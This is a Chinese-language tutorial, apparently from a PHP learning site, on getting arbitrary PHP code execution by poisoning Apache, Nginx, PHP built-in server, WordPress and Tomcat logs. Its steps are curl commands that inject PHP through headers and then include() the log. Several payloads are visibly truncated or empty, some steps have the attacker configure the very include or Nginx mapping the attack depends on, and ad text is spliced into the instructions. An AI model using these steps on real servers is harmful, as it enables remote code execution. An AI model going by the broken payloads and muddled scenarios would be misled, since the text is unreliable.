日志分析怎样触发php代码执行_日志分析触发php代码执行方法【说明】

日志注入可导致任意PHP代码执行，主要途径包括：一、Apache访问日志+User-Agent注入；二、Nginx错误日志+fastcgi_split_path_info缺陷；三、PHP内置服务器自定义日志未过滤；四、WordPress插件日志未净化；五、Tomcat access log被Nginx误当PHP解析。

如果Web服务器日志中包含用户可控输入且日志文件被PHP解析执行，则可能通过日志注入触发任意PHP代码执行。以下是实现该行为的多种方法：

一、利用Apache访问日志包含User-Agent字段并被include

当PHP脚本使用include或require动态加载Apache访问日志，且攻击者能控制User-Agent头时，可将PHP代码注入日志并触发执行。

1、使用curl发送携带恶意User-Agent的请求：
curl -H "User-Agent: php system('id'); ?>" http://target.com/index.php

2、确认日志路径，常见为/var/log/apache2/access.log或/var/log/httpd/access_log

立即学习“PHP免费学习笔记（深入）”；

3、构造PHP页面，内容为：<?php include('/var/log/apache2/access.log'); ?>

4、访问该PHP页面，服务器将解析日志中嵌入的<?php system('id'); ?>并执行

5、若日志中存在PHP短标签未被禁用且log文件具有可读权限，则代码可成功执行

二、利用Nginx错误日志配合fastcgi_split_path_info

在Nginx + PHP-FPM配置中，若fastcgi_split_path_info正则存在缺陷，可能导致错误日志路径被解析为PHP脚本，从而将恶意payload写入error.log并触发执行。

1、向不存在的PHP路径发起请求，例如：http://target.com/xxx.php/xxx.jpg

2、在请求中注入PHP代码到URI或Referer头：
curl -H "Referer: " http://target.com/xxx.php/xxx.jpg

3、确认Nginx错误日志路径，通常为/var/log/nginx/error.log

4、访问一个可导致Nginx将error.log作为PHP脚本处理的特殊路径，如：http://target.com/xxx.jpg/.php

5、关键条件是Nginx配置中存在不安全的fastcgi_split_path_info正则且error.log被PHP-FPM解析

三、利用PHP内置Web服务器的日志注入

PHP内置服务器（php -S）默认将请求日志输出到STDOUT，但若开发者自定义日志写入文件且未过滤输入，可能造成日志文件被后续include操作执行。

1、启动PHP内置服务器并指定路由脚本：php -S 0.0.0.0:8000 router.php

2、在router.php中实现日志记录逻辑，例如：file_put_contents('app.log', $_SERVER['REQUEST_URI'] . "\n", FILE_APPEND);

ImgGood

免费在线AI照片编辑器

下载

3、发送含PHP代码的请求：curl "http://localhost:8000/"

4、确保另一处PHP代码执行include('app.log')或类似操作

5、必须满足日志文件路径可预测且写入内容未经过滤、未转义

四、利用WordPress插件日志功能写入可执行内容

部分WordPress插件（如WP Debug Log、Query Monitor）将调试信息或SQL查询记录至自定义日志文件，若日志内容未净化且该文件路径可通过主题或插件模板include，则构成执行链。

1、启用调试模式并在wp-config.php中设置define('WP_DEBUG_LOG', true);

2、触发插件记录敏感数据，例如构造含PHP代码的SQL查询或HTTP头

3、查找插件日志文件路径，常见为/wp-content/debug.log或/wp-content/plugins/plugin-name/logs/

4、创建模板文件（如page-log-exec.php），内容为：<?php include(ABSPATH . 'wp-content/debug.log'); ?>

5、需确保插件未对日志内容进行HTML实体编码或PHP标签过滤

五、利用Tomcat access log结合JSP解析漏洞间接触发PHP执行

在混合环境（如Nginx反代Tomcat + PHP-FPM共存）中，若Nginx将特定后缀（如.jsp）转发至PHP处理器，且Tomcat access.log被Nginx以PHP方式解析，则可通过伪造JSP请求将PHP代码写入access.log并触发。

1、向Tomcat发送含恶意User-Agent的请求：
curl -H "User-Agent: " http://tomcat-backend:8080/test.jsp

2、确认Tomcat access log路径，通常为$CATALINA_HOME/logs/access_log.yyyy-mm-dd

3、配置Nginx location块，使对*.jsp路径的请求由PHP-FPM处理而非代理至Tomcat

4、访问Nginx上对应日志文件路径，如http://nginx-proxy/access_log.2024-01-01

5、前提条件是Nginx配置错误导致日志文件扩展名匹配PHP处理器且无访问限制